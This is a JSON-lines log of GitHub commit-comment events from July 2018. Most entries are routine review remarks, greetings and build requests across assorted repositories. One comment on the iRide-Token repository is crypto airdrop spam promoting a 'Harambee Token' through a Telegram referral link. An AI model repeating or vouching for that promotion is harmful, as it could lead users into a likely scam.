{"id":"8034077146","type":"CommitCommentEvent","actor":{"login":"StupidDan"},"repo":{"name":"StupidDan/UnitedExpeditions-Website"},"payload":{"comment":{"id":29874591,"position":null,"line":null,"path":null,"commit_id":"bf6fc421a2bb19ba27dcee6d08e4922ad5171971","created_at":"2018-07-29T14:32:02Z","updated_at":"2018-07-29T14:32:02Z","author_association":"OWNER","body":"(also centered everything using a container as everything seemed very messy being across the screen)"}},"created_at":"2018-07-29T14:32:02Z"}
{"id":"8034078535","type":"CommitCommentEvent","actor":{"login":"banshee13"},"repo":{"name":"banshee13/youtubes"},"payload":{"comment":{"id":29874593,"position":null,"line":null,"path":null,"commit_id":"3bb77e9b05d7724baa190b295cc92cc928fba3ca","created_at":"2018-07-29T14:32:55Z","updated_at":"2018-07-29T14:32:55Z","author_association":"OWNER","body":"S"}},"created_at":"2018-07-29T14:32:55Z"}
{"id":"8034079082","type":"CommitCommentEvent","actor":{"login":"sirathashimi"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29874595,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-29T14:33:16Z","updated_at":"2018-07-29T14:33:16Z","author_association":"NONE","body":"New Airdrop: Harambee Token!!Leveraging on the blockchain technology, Land\nLayBy is building a trusted shared distributed ledger for recording land\nbuying and selling transactions that can never be altered, corrupted,\nforged or replicated in error. Chat with the telegram bot and get 100 HRBE\n($70) and get 150 HRBE ($105) for every referral.\nhttp://t.me/HrbeAirDropBot?start=568459030\n\nOn Sunday, July 29, 2018, boante <notifications@github.com> wrote:\n\n> good\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/iride2020/iRide-Token/commit/8f810b3700a24de0ee4f945ef84be7b2f1605610#commitcomment-29874282>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/Am4jXdUIXgFo4MtoqJ_dTIoXQkDO4b1pks5uLbaZgaJpZM4VaEAl>\n> .\n>\n"}},"created_at":"2018-07-29T14:33:16Z"}
{"id":"8034079833","type":"CommitCommentEvent","actor":{"login":"blueberry"},"repo":{"name":"bbatsov/prelude"},"payload":{"comment":{"id":29874597,"position":null,"line":null,"path":null,"commit_id":"d6786e33f1bd52ff37af9c826be7db0c70c96b42","created_at":"2018-07-29T14:33:44Z","updated_at":"2018-07-29T14:33:44Z","author_association":"NONE","body":"@codabrink Why would we remove this when you can set it to normal behavior with `(global-set-key [remap other-window] 'other-window)`?\r\n\r\n(I would also prefer the old behavior to be the default, but since bbatsov prefers the new, and he is the one doing the work, I think it's a bit annoying if we nag him about that when there is a one-liner setting that makes emacs work exactly as we like)."}},"created_at":"2018-07-29T14:33:44Z"}
{"id":"8034082167","type":"CommitCommentEvent","actor":{"login":"Konrad22"},"repo":{"name":"Konrad22/wesnoth"},"payload":{"comment":{"id":29874601,"position":null,"line":null,"path":null,"commit_id":"2b473e366b3e44d240116cc9eb5ec29fcda93349","created_at":"2018-07-29T14:35:17Z","updated_at":"2018-07-29T14:35:17Z","author_association":"OWNER","body":"New map for SoF - Sc1 to fix #3383 (removing the fast way to reach the elvish leader, by replacing some regular mountains with snowy mountains)."}},"created_at":"2018-07-29T14:35:17Z"}
{"id":"8034083667","type":"CommitCommentEvent","actor":{"login":"THULiusj"},"repo":{"name":"THULiusj/CosmicadDetection-Keras-Tensorflow-FasterRCNN"},"payload":{"comment":{"id":29874607,"position":null,"line":null,"path":null,"commit_id":"db219e087e2053b6d4c06ca458f20c7c1ef5890d","created_at":"2018-07-29T14:36:16Z","updated_at":"2018-07-29T14:36:16Z","author_association":"OWNER","body":"shliup@microsoft.com"}},"created_at":"2018-07-29T14:36:16Z"}
{"id":"8034084018","type":"CommitCommentEvent","actor":{"login":"DandyDev"},"repo":{"name":"DandyDev/slack-machine"},"payload":{"comment":{"id":29874611,"position":5,"line":31,"path":"docs/user/usage.rst","commit_id":"2d72e02e1108b5513e5671328f724f71b2703a51","created_at":"2018-07-29T14:36:31Z","updated_at":"2018-07-29T14:36:31Z","author_association":"OWNER","body":"Should be: \"Be cautious\""}},"created_at":"2018-07-29T14:36:31Z"}
{"id":"8034085858","type":"CommitCommentEvent","actor":{"login":"THULiusj"},"repo":{"name":"THULiusj/CosmicadDetection-Keras-Tensorflow-FasterRCNN"},"payload":{"comment":{"id":29874613,"position":null,"line":null,"path":null,"commit_id":"db219e087e2053b6d4c06ca458f20c7c1ef5890d","created_at":"2018-07-29T14:37:47Z","updated_at":"2018-07-29T14:37:47Z","author_association":"OWNER","body":"shliup@microsoft.com"}},"created_at":"2018-07-29T14:37:47Z"}
{"id":"8034085952","type":"CommitCommentEvent","actor":{"login":"pmetzger"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29874614,"position":10,"line":10,"path":"sysutils/packer/Portfile","commit_id":"d6f358ff080464824885ed8063573077749dff43","created_at":"2018-07-29T14:37:51Z","updated_at":"2018-07-29T14:37:51Z","author_association":"MEMBER","body":"@newtonne Please submit a pull request to fix this soon.\r\n\r\n@yan12125 We should have caught this before merging, FYI."}},"created_at":"2018-07-29T14:37:51Z"}
{"id":"8034087696","type":"CommitCommentEvent","actor":{"login":"pmetzger"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29874616,"position":null,"line":null,"path":null,"commit_id":"0faec67c6645efce76ad42b216fb246c78fcef37","created_at":"2018-07-29T14:39:01Z","updated_at":"2018-07-29T14:39:01Z","author_association":"MEMBER","body":"I don't think we allow editing of commit messages."}},"created_at":"2018-07-29T14:39:01Z"}
{"id":"8034088699","type":"CommitCommentEvent","actor":{"login":"vipuldarji"},"repo":{"name":"vipuldarji/vipuldarji.github.io"},"payload":{"comment":{"id":29874620,"position":1,"line":1,"path":"index.html","commit_id":"c5f9a994cce687135ef4938af315cf84e63d23ad","created_at":"2018-07-29T14:39:43Z","updated_at":"2018-07-29T14:39:43Z","author_association":"OWNER","body":"hi"}},"created_at":"2018-07-29T14:39:43Z"}
{"id":"8034088876","type":"CommitCommentEvent","actor":{"login":"JoaoVFG"},"repo":{"name":"JoaoVFG/sysrlog"},"payload":{"comment":{"id":29874621,"position":null,"line":null,"path":null,"commit_id":"339927cd444d1b9f128446bc4bf9f07686c8893f","created_at":"2018-07-29T14:39:49Z","updated_at":"2018-07-29T14:39:49Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [040 - Mudar padrão dos Scripts do Liquibase](https://trello.com/c/j1TVjGEF/50-040-mudar-padr%C3%A3o-dos-scripts-do-liquibase)"}},"created_at":"2018-07-29T14:39:49Z"}
{"id":"8034089251","type":"CommitCommentEvent","actor":{"login":"JoaoVFG"},"repo":{"name":"JoaoVFG/sysrlog"},"payload":{"comment":{"id":29874622,"position":null,"line":null,"path":null,"commit_id":"d1292d1537f67c5f3ea02f489973c4e34b2b770d","created_at":"2018-07-29T14:40:05Z","updated_at":"2018-07-29T14:40:05Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [041 - Criar Parametrizações de configurações](https://trello.com/c/J2U2cip4/51-041-criar-parametriza%C3%A7%C3%B5es-de-configura%C3%A7%C3%B5es)"}},"created_at":"2018-07-29T14:40:05Z"}
{"id":"8034090923","type":"CommitCommentEvent","actor":{"login":"ilyafefelov"},"repo":{"name":"podolsky4/TextMessenger"},"payload":{"comment":{"id":29874629,"position":null,"line":null,"path":null,"commit_id":"939f0e9e2abd71c5f99cd55fdae12e21d8adf97e","created_at":"2018-07-29T14:41:10Z","updated_at":"2018-07-29T14:41:10Z","author_association":"COLLABORATOR","body":"Why?"}},"created_at":"2018-07-29T14:41:10Z"}
{"id":"8034094030","type":"CommitCommentEvent","actor":{"login":"KitelMarta"},"repo":{"name":"lukaszsadowski1/tz"},"payload":{"comment":{"id":29874636,"position":null,"line":null,"path":null,"commit_id":"f7ab22662d6d790cb700ad8c08b8ceb38bd60931","created_at":"2018-07-29T14:43:06Z","updated_at":"2018-07-29T14:43:06Z","author_association":"COLLABORATOR","body":"hi"}},"created_at":"2018-07-29T14:43:06Z"}
{"id":"8034094625","type":"CommitCommentEvent","actor":{"login":"danchr"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29874638,"position":null,"line":null,"path":null,"commit_id":"0faec67c6645efce76ad42b216fb246c78fcef37","created_at":"2018-07-29T14:43:28Z","updated_at":"2018-07-29T14:43:28Z","author_association":"CONTRIBUTOR","body":"Well, I didn't push it to master, so I could actually do a force push. My motivation for pushing it to this repository rather than my fork was to see if I could get the buildbot to do a build, since Travis timed out. Turns out that's not possible, so I deleted the branch.\r\n\r\nI posted #2287 to get some feedback for these changes, but haven't got any so far…"}},"created_at":"2018-07-29T14:43:28Z"}
{"id":"8034095143","type":"CommitCommentEvent","actor":{"login":"tttak"},"repo":{"name":"tttak/YaneuraOu"},"payload":{"comment":{"id":29874640,"position":null,"line":null,"path":null,"commit_id":"7e6ae79d0e4cfaec0701199fc0a151eaa0d4c42b","created_at":"2018-07-29T14:43:49Z","updated_at":"2018-07-29T14:43:49Z","author_association":"OWNER","body":"はじめまして。\r\nNNUEEmptyで、テストコマンド「test nnue test_features」でエラーになってしまうようでしたので修正してみました。\r\n評価関数の全計算と差分計算で結果が異なるようでしたので、全計算の方を修正してみました。"}},"created_at":"2018-07-29T14:43:49Z"}
{"id":"8034095899","type":"CommitCommentEvent","actor":{"login":"elfring"},"repo":{"name":"sohail/csv"},"payload":{"comment":{"id":29874642,"position":null,"line":null,"path":null,"commit_id":"1636a9e4039a60d97a0aaeb10ac9485a29bb2666","created_at":"2018-07-29T14:44:19Z","updated_at":"2018-07-29T14:44:19Z","author_association":"NONE","body":"It seems that you repaired “side effects” from [surprising code deletions](https://github.com/sohail/csv/commit/9ba7c2a7d7ebbdb379ac12f395c3c2229661166c#r29824681 \"Renaming of preprocessor symbols\").\r\nWould an other commit message be more appropriate then?"}},"created_at":"2018-07-29T14:44:19Z"}
{"id":"8034096235","type":"CommitCommentEvent","actor":{"login":"JoaoVFG"},"repo":{"name":"JoaoVFG/sysrlog"},"payload":{"comment":{"id":29874643,"position":null,"line":null,"path":null,"commit_id":"53995afd632d13e925bbe5e1416c49f81a71b70e","created_at":"2018-07-29T14:44:30Z","updated_at":"2018-07-29T14:44:30Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [041 - Criar Parametrizações de configurações](https://trello.com/c/J2U2cip4/51-041-criar-parametriza%C3%A7%C3%B5es-de-configura%C3%A7%C3%B5es)"}},"created_at":"2018-07-29T14:44:30Z"}
{"id":"8034097476","type":"CommitCommentEvent","actor":{"login":"nschneid"},"repo":{"name":"nert-gu/Xposition"},"payload":{"comment":{"id":29874647,"position":null,"line":null,"path":null,"commit_id":"b17c7bb88e6ebad8fbb80d6092985f0ed65479d1","created_at":"2018-07-29T14:45:13Z","updated_at":"2018-07-29T14:45:13Z","author_association":"CONTRIBUTOR","body":"Weird! Let me poke around in the db."}},"created_at":"2018-07-29T14:45:13Z"}
{"id":"8034101002","type":"CommitCommentEvent","actor":{"login":"tophertimzen"},"repo":{"name":"BSidesPDX/bsidespdx.org"},"payload":{"comment":{"id":29874653,"position":null,"line":null,"path":null,"commit_id":"d5108e64f4f62ed5ea24549ca2447af163c1c0ef","created_at":"2018-07-29T14:47:27Z","updated_at":"2018-07-29T14:47:27Z","author_association":"MEMBER","body":"Date needs to be updated to 2018. "}},"created_at":"2018-07-29T14:47:27Z"}
{"id":"8034101257","type":"CommitCommentEvent","actor":{"login":"mrubinsk"},"repo":{"name":"horde/horde"},"payload":{"comment":{"id":29874657,"position":null,"line":null,"path":null,"commit_id":"eecdbee303d91dae3613dbf45c1c6634d27340e6","created_at":"2018-07-29T14:47:38Z","updated_at":"2018-07-29T14:47:38Z","author_association":"MEMBER","body":"You are \"missing\" this commit because it's in the master branch of the various repositories, not our stable branch.  These changes will be released with the next (admittedly very late) major release of our applications.\r\n\r\nNot sure what you mean by it affected ActiveSync, nothing in this commit changes any code related to EAS."}},"created_at":"2018-07-29T14:47:38Z"}
{"id":"8034102345","type":"CommitCommentEvent","actor":{"login":"unknownbear"},"repo":{"name":"Hack-with-Github/Awesome-Hacking"},"payload":{"comment":{"id":29874660,"position":null,"line":null,"path":null,"commit_id":"123ffd5a5a45b5fa732876f7a7dbb164734c10ee","created_at":"2018-07-29T14:48:23Z","updated_at":"2018-07-29T14:48:23Z","author_association":"NONE","body":"Hi\n\n\n> On Jul 29, 2018, at 6:18 AM, moodisd <notifications@github.com <mailto:notifications@github.com>> wrote:\n> \n> hey\n> \n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub <https://github.com/Hack-with-Github/Awesome-Hacking/commit/123ffd5a5a45b5fa732876f7a7dbb164734c10ee#commitcomment-29873830>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AdltfvshqrkOg-OaFm8pA8qA5JxUqkHLks5uLZoLgaJpZM4VlYh5>.\n> \n\n"}},"created_at":"2018-07-29T14:48:23Z"}
{"id":"8034102823","type":"CommitCommentEvent","actor":{"login":"dina-adel"},"repo":{"name":"dina-adel/hello_world"},"payload":{"comment":{"id":29874661,"position":null,"line":null,"path":null,"commit_id":"afa207e7a1d7bf075a548c4c0727af2cb0d97c99","created_at":"2018-07-29T14:48:44Z","updated_at":"2018-07-29T14:48:44Z","author_association":"OWNER","body":"I dont understand what is this XD"}},"created_at":"2018-07-29T14:48:44Z"}
{"id":"8034102991","type":"CommitCommentEvent","actor":{"login":"ThayneKerr"},"repo":{"name":"Heltec-Aaron-Lee/WiFi_Kit_series"},"payload":{"comment":{"id":29874662,"position":null,"line":null,"path":null,"commit_id":"3c2bedf8d2aa41b3bca6da3a9c7a78389b8a932c","created_at":"2018-07-29T14:48:52Z","updated_at":"2018-07-29T14:48:52Z","author_association":"NONE","body":"LOL."}},"created_at":"2018-07-29T14:48:52Z"}
{"id":"8034103303","type":"CommitCommentEvent","actor":{"login":"gkurmanova"},"repo":{"name":"gkurmanova/kokserek"},"payload":{"comment":{"id":29874663,"position":null,"line":null,"path":null,"commit_id":"eda0d45fb324725db4734c2fcd6e02836c880202","created_at":"2018-07-29T14:49:07Z","updated_at":"2018-07-29T14:49:07Z","author_association":"OWNER","body":"DEFAULT_FROM_EMAIL добавлено  mg в DEFAULT_FROM_EMAIL = 'Django Boards <noreply@mg.kokserek.site>'"}},"created_at":"2018-07-29T14:49:07Z"}
{"id":"8034104096","type":"CommitCommentEvent","actor":{"login":"codabrink"},"repo":{"name":"bbatsov/prelude"},"payload":{"comment":{"id":29874664,"position":null,"line":null,"path":null,"commit_id":"d6786e33f1bd52ff37af9c826be7db0c70c96b42","created_at":"2018-07-29T14:49:40Z","updated_at":"2018-07-29T14:49:40Z","author_association":"NONE","body":"It just feels like a weird decision to overwrite such a fundamental key-combination with something inherently more complicated and mentally tasking.\r\nWith `other-window` I don't have to think while switching windows. With `ace-window`, I have to stop thinking about the code I'm writing, read the window numbers, match that to a number key, press it, and refocus my thought process back to the track it was on. It just seems like it gets in the way.\r\nIdk, maybe I need to give it a couple weeks for it to become second nature. I might give it a second chance.\r\nIt feels like this should be opt-in."}},"created_at":"2018-07-29T14:49:40Z"}
{"id":"8034105681","type":"CommitCommentEvent","actor":{"login":"LongCatIsLooong"},"repo":{"name":"LongCatIsLooong/PunOko"},"payload":{"comment":{"id":29874667,"position":null,"line":null,"path":null,"commit_id":"24feb13e697b81b3de54eacb6ed58d263ac176e9","created_at":"2018-07-29T14:50:38Z","updated_at":"2018-07-29T14:50:38Z","author_association":"OWNER","body":"pLeAsE rUn [build]"}},"created_at":"2018-07-29T14:50:38Z"}
{"id":"8034108654","type":"CommitCommentEvent","actor":{"login":"muhammadjon1996"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29874672,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-29T14:52:28Z","updated_at":"2018-07-29T14:52:28Z","author_association":"NONE","body":"thanks guys for your done job!"}},"created_at":"2018-07-29T14:52:28Z"}
{"id":"8034109098","type":"CommitCommentEvent","actor":{"login":"RC2202"},"repo":{"name":"RC2202/RC2202.github.io"},"payload":{"comment":{"id":29874676,"position":null,"line":null,"path":null,"commit_id":"0a0e34a39bf55d94843f8786a7d1ee82dce5e051","created_at":"2018-07-29T14:52:45Z","updated_at":"2018-07-29T14:52:45Z","author_association":"OWNER","body":"href updated"}},"created_at":"2018-07-29T14:52:45Z"}
{"id":"8034113997","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"megabytus/thinknetica_home_work"},"payload":{"comment":{"id":29874687,"position":16,"line":20,"path":"ruby_basics_part_1/quadratic_equation.rb","commit_id":"26df2bd53e13ea811034986d1edf93f38930703f","created_at":"2018-07-29T14:56:03Z","updated_at":"2018-07-29T14:56:03Z","author_association":"NONE","body":"какой-то очень странный метод, который вызывает сам себя ) \r\nесли его вызвать произойдет бесконечная рекурсия, переполнение стека памяти и падение программы\r\nмне кажется ты запутался... или просто ошибся?"}},"created_at":"2018-07-29T14:56:03Z"}
{"id":"8034119661","type":"CommitCommentEvent","actor":{"login":"nbolton"},"repo":{"name":"symless/synergy-core"},"payload":{"comment":{"id":29874696,"position":null,"line":null,"path":null,"commit_id":"f9b83f9516e64d9a330510f81f3d7c7eae06ef6d","created_at":"2018-07-29T14:59:47Z","updated_at":"2018-07-29T14:59:47Z","author_association":"MEMBER","body":"#6375"}},"created_at":"2018-07-29T14:59:47Z"}
{"id":"8034121831","type":"CommitCommentEvent","actor":{"login":"setsunadoudou"},"repo":{"name":"Riunshow/short-semester"},"payload":{"comment":{"id":29874709,"position":null,"line":null,"path":null,"commit_id":"be18847df2887549a1bdf91d04568225e9b0b8f4","created_at":"2018-07-29T15:01:00Z","updated_at":"2018-07-29T15:01:00Z","author_association":"NONE","body":"very very nice!"}},"created_at":"2018-07-29T15:01:00Z"}
{"id":"8034122084","type":"CommitCommentEvent","actor":{"login":"crissole"},"repo":{"name":"crissole/ISEM-501-A-2018_Version-Control"},"payload":{"comment":{"id":29874710,"position":null,"line":null,"path":null,"commit_id":"53a73a1120109ac1a7d1543ad4f0c1722a048d1f","created_at":"2018-07-29T15:01:09Z","updated_at":"2018-07-29T15:01:09Z","author_association":"OWNER","body":"This presentation includes a high level explanation of version control best practices"}},"created_at":"2018-07-29T15:01:09Z"}
{"id":"8034123802","type":"CommitCommentEvent","actor":{"login":"mixa9269"},"repo":{"name":"mixa9269/Project_Form"},"payload":{"comment":{"id":29874715,"position":28,"line":94,"path":"src/containers/AppContainer.js","commit_id":"1fef60c111b39d92a519a32ee0772d192faebc6f","created_at":"2018-07-29T15:02:13Z","updated_at":"2018-07-29T15:02:13Z","author_association":"OWNER","body":"тут return не нужен. Моя ошибка"}},"created_at":"2018-07-29T15:02:13Z"}
{"id":"8034124608","type":"CommitCommentEvent","actor":{"login":"LongCatIsLooong"},"repo":{"name":"LongCatIsLooong/PunOko"},"payload":{"comment":{"id":29874717,"position":null,"line":null,"path":null,"commit_id":"c0c1768fb32e4903aaf67cc28a428da4dc60b02c","created_at":"2018-07-29T15:02:46Z","updated_at":"2018-07-29T15:02:46Z","author_association":"OWNER","body":"PLEASE run [build]"}},"created_at":"2018-07-29T15:02:46Z"}
{"id":"8034125109","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"megabytus/thinknetica_home_work"},"payload":{"comment":{"id":29874722,"position":31,"line":41,"path":"ruby_basics_part_1/quadratic_equation.rb","commit_id":"26df2bd53e13ea811034986d1edf93f38930703f","created_at":"2018-07-29T15:03:01Z","updated_at":"2018-07-29T15:03:01Z","author_association":"NONE","body":"вот про эту ветвь вычилсений, когда дискриминант болше ноля я при первой проверке написал следующее:\r\n\r\n> а еще правильней передать не сам дискриминант, а корень из него, который будет вычислен после  39 строки\r\n> чтобы не считать корень два раза\r\n> сейчас же получается, что дискриминант вычисляется три раза, а корень - два\r\n> таких ситуаций лучше не допускать\r\n\r\nномера строк уже поменялись, но суть осталась та же: в 42 строке вызывается вычисление корня и в 43 строке вызывается вычисление другого корня\r\nв обоих методах далее вызывается `squre_root(descrmnt)`, т.е. корень ты вычислешь дважды\r\nа зачем?\r\nеще раз перечитай мой комметарий выше или комментарий Влада на прошлой проверке [тут](https://github.com/megabytus/thinknetica_home_work/commit/281a9f142f10c856bd2c21355f86d05e619e9b95#diff-308d73091b81d6485101ab60e651239e)\r\n\r\nмы оба предлагаем тебе сделать одно и то же\r\nсначала вычислить корень из дискриминанта\r\nа потом уже этот корень передавать в методы вычисления корней\r\nчтобы не было вычисления корня дважды"}},"created_at":"2018-07-29T15:03:01Z"}
{"id":"8034125849","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"gvreuls/Stockfish"},"payload":{"comment":{"id":29874725,"position":null,"line":null,"path":null,"commit_id":"6c4f168655bb5129f64098528731f9fa0199a9ff","created_at":"2018-07-29T15:03:28Z","updated_at":"2018-07-29T15:03:28Z","author_association":"NONE","body":"This PR speed ups on mulit-core the build process of stockfish not the speed of stockfish himself.\r\n\r\nI see that Michael reports also a speed up of the resulting binaries but that is very probable a fluke because there is no reason the compilers does something different but doing lto in parallel.\r\n"}},"created_at":"2018-07-29T15:03:28Z"}
{"id":"8034126235","type":"CommitCommentEvent","actor":{"login":"LongCatIsLooong"},"repo":{"name":"LongCatIsLooong/PunOko"},"payload":{"comment":{"id":29874726,"position":null,"line":null,"path":null,"commit_id":"c0c1768fb32e4903aaf67cc28a428da4dc60b02c","created_at":"2018-07-29T15:03:44Z","updated_at":"2018-07-29T15:03:44Z","author_association":"OWNER","body":"pLEASE rUN [build]"}},"created_at":"2018-07-29T15:03:44Z"}
{"id":"8034127240","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"gvreuls/Stockfish"},"payload":{"comment":{"id":29874727,"position":null,"line":null,"path":null,"commit_id":"6c4f168655bb5129f64098528731f9fa0199a9ff","created_at":"2018-07-29T15:04:23Z","updated_at":"2018-07-29T15:04:23Z","author_association":"NONE","body":"But i approve to go sure with half throughput."}},"created_at":"2018-07-29T15:04:23Z"}
{"id":"8034127563","type":"CommitCommentEvent","actor":{"login":"LongCatIsLooong"},"repo":{"name":"LongCatIsLooong/PunOko"},"payload":{"comment":{"id":29874728,"position":null,"line":null,"path":null,"commit_id":"c0c1768fb32e4903aaf67cc28a428da4dc60b02c","created_at":"2018-07-29T15:04:36Z","updated_at":"2018-07-29T15:04:36Z","author_association":"OWNER","body":"PLEASE RUN [build]"}},"created_at":"2018-07-29T15:04:36Z"}
{"id":"8034128591","type":"CommitCommentEvent","actor":{"login":"wrinks76"},"repo":{"name":"wrinks76/bash_scripts"},"payload":{"comment":{"id":29874736,"position":null,"line":null,"path":null,"commit_id":"94c4cb1609f402487c809d2a4ae1fbeca24ed254","created_at":"2018-07-29T15:05:18Z","updated_at":"2018-07-29T15:05:18Z","author_association":"OWNER","body":"Second commit actually. :]"}},"created_at":"2018-07-29T15:05:18Z"}
{"id":"8034131057","type":"CommitCommentEvent","actor":{"login":"kxespal"},"repo":{"name":"kxespal/kxgit"},"payload":{"comment":{"id":29874743,"position":1,"line":1,"path":"test/b.txt","commit_id":"75d12ad53f2e1d5a4fa3d858e5a914357d813857","created_at":"2018-07-29T15:07:00Z","updated_at":"2018-07-29T15:07:00Z","author_association":"OWNER","body":"hello,i am kxespal and i write something in github."}},"created_at":"2018-07-29T15:07:00Z"}
{"id":"8034131774","type":"CommitCommentEvent","actor":{"login":"kxespal"},"repo":{"name":"kxespal/kxgit"},"payload":{"comment":{"id":29874745,"position":null,"line":null,"path":null,"commit_id":"75d12ad53f2e1d5a4fa3d858e5a914357d813857","created_at":"2018-07-29T15:07:29Z","updated_at":"2018-07-29T15:07:29Z","author_association":"OWNER","body":"first github"}},"created_at":"2018-07-29T15:07:29Z"}
{"id":"8034134615","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29874749,"position":25,"line":153,"path":"code/drasil-lang/Language/Drasil/Document.hs","commit_id":"2510bea9cc9a96ae1ccdbb88adc8b3f58f3733e4","created_at":"2018-07-29T15:09:29Z","updated_at":"2018-07-29T15:09:29Z","author_association":"OWNER","body":"```haskell\r\ndatadefn = llcc mkEmptyLabel . Definition . Data\r\n```"}},"created_at":"2018-07-29T15:09:29Z"}
{"id":"8034135126","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29874750,"position":4,"line":189,"path":"code/drasil-lang/Language/Drasil/Reference.hs","commit_id":"2510bea9cc9a96ae1ccdbb88adc8b3f58f3733e4","created_at":"2018-07-29T15:09:52Z","updated_at":"2018-07-29T15:09:52Z","author_association":"OWNER","body":"Yes, please."}},"created_at":"2018-07-29T15:09:52Z"}
{"id":"8034136765","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29874763,"position":null,"line":null,"path":null,"commit_id":"f3297e8b8c549c9af92c695eec1587747806fb9a","created_at":"2018-07-29T15:10:58Z","updated_at":"2018-07-29T15:10:58Z","author_association":"OWNER","body":"The `datadefn` and `reldefn` definitions can be 'shortened' as per my comment on the previous check-in."}},"created_at":"2018-07-29T15:10:58Z"}
{"id":"8034137007","type":"CommitCommentEvent","actor":{"login":"nschneid"},"repo":{"name":"nert-gu/Xposition"},"payload":{"comment":{"id":29874766,"position":null,"line":null,"path":null,"commit_id":"b17c7bb88e6ebad8fbb80d6092985f0ed65479d1","created_at":"2018-07-29T15:11:07Z","updated_at":"2018-07-29T15:11:07Z","author_association":"CONTRIBUTOR","body":"So I thought `Adposition.usages` was a list of `Usage`s, but turns out it's a list of `UsageRevision`s. Fixing."}},"created_at":"2018-07-29T15:11:07Z"}
{"id":"8034139473","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29874769,"position":5,"line":254,"path":"code/drasil-printers/Language/Drasil/Printing/Import.hs","commit_id":"79ef47ee97ca0a8b0d1dc880c1739dd2fc651a81","created_at":"2018-07-29T15:12:45Z","updated_at":"2018-07-29T15:12:45Z","author_association":"OWNER","body":"No need for the extra () after `$` (here and in following lines)."}},"created_at":"2018-07-29T15:12:45Z"}
{"id":"8034140022","type":"CommitCommentEvent","actor":{"login":"stdbreaks"},"repo":{"name":"KodiaqQ/SignDetection"},"payload":{"comment":{"id":29874771,"position":null,"line":null,"path":null,"commit_id":"6e40b42a285999bff367ad683dbe95c44202edf4","created_at":"2018-07-29T15:13:08Z","updated_at":"2018-07-29T15:13:08Z","author_association":"NONE","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Подготовить модель для классификации знаков](https://trello.com/c/Btbu3ZYM/3-%D0%BF%D0%BE%D0%B4%D0%B3%D0%BE%D1%82%D0%BE%D0%B2%D0%B8%D1%82%D1%8C-%D0%BC%D0%BE%D0%B4%D0%B5%D0%BB%D1%8C-%D0%B4%D0%BB%D1%8F-%D0%BA%D0%BB%D0%B0%D1%81%D1%81%D0%B8%D1%84%D0%B8%D0%BA%D0%B0%D1%86%D0%B8%D0%B8-%D0%B7%D0%BD%D0%B0%D0%BA%D0%BE%D0%B2)"}},"created_at":"2018-07-29T15:13:08Z"}
{"id":"8034142820","type":"CommitCommentEvent","actor":{"login":"yotsuba1022"},"repo":{"name":"ChengIrene/fujyosi-diary"},"payload":{"comment":{"id":29874776,"position":null,"line":null,"path":null,"commit_id":"a696de38c81fff548278845304126c4edeafa0ec","created_at":"2018-07-29T15:15:02Z","updated_at":"2018-07-29T15:15:02Z","author_association":"NONE","body":"💯"}},"created_at":"2018-07-29T15:15:02Z"}
{"id":"8034143000","type":"CommitCommentEvent","actor":{"login":"yotsuba1022"},"repo":{"name":"ChengIrene/fujyosi-diary"},"payload":{"comment":{"id":29874780,"position":null,"line":null,"path":null,"commit_id":"f05e38bfb452b7b8f99ce7c04378ef19f1b05f57","created_at":"2018-07-29T15:15:10Z","updated_at":"2018-07-29T15:15:10Z","author_association":"NONE","body":"💯"}},"created_at":"2018-07-29T15:15:10Z"}
{"id":"8034143366","type":"CommitCommentEvent","actor":{"login":"yotsuba1022"},"repo":{"name":"ChengIrene/java-workshop"},"payload":{"comment":{"id":29874784,"position":null,"line":null,"path":null,"commit_id":"79b24cca9b1729a80e587ab8d468c84d281074c8","created_at":"2018-07-29T15:15:22Z","updated_at":"2018-07-29T15:15:22Z","author_association":"NONE","body":"💯"}},"created_at":"2018-07-29T15:15:22Z"}
{"id":"8034144111","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29874789,"position":null,"line":null,"path":null,"commit_id":"b5640b06c3b6bb45e5a62585ad73c93861a8619b","created_at":"2018-07-29T15:15:48Z","updated_at":"2018-07-29T15:15:48Z","author_association":"OWNER","body":"I definitely like this change. Though, in some sense, it would be even better if the label was `Table:useCase`.  So I think it should be the `LabelledContent` which should set this label, rather than the printing back-end."}},"created_at":"2018-07-29T15:15:48Z"}
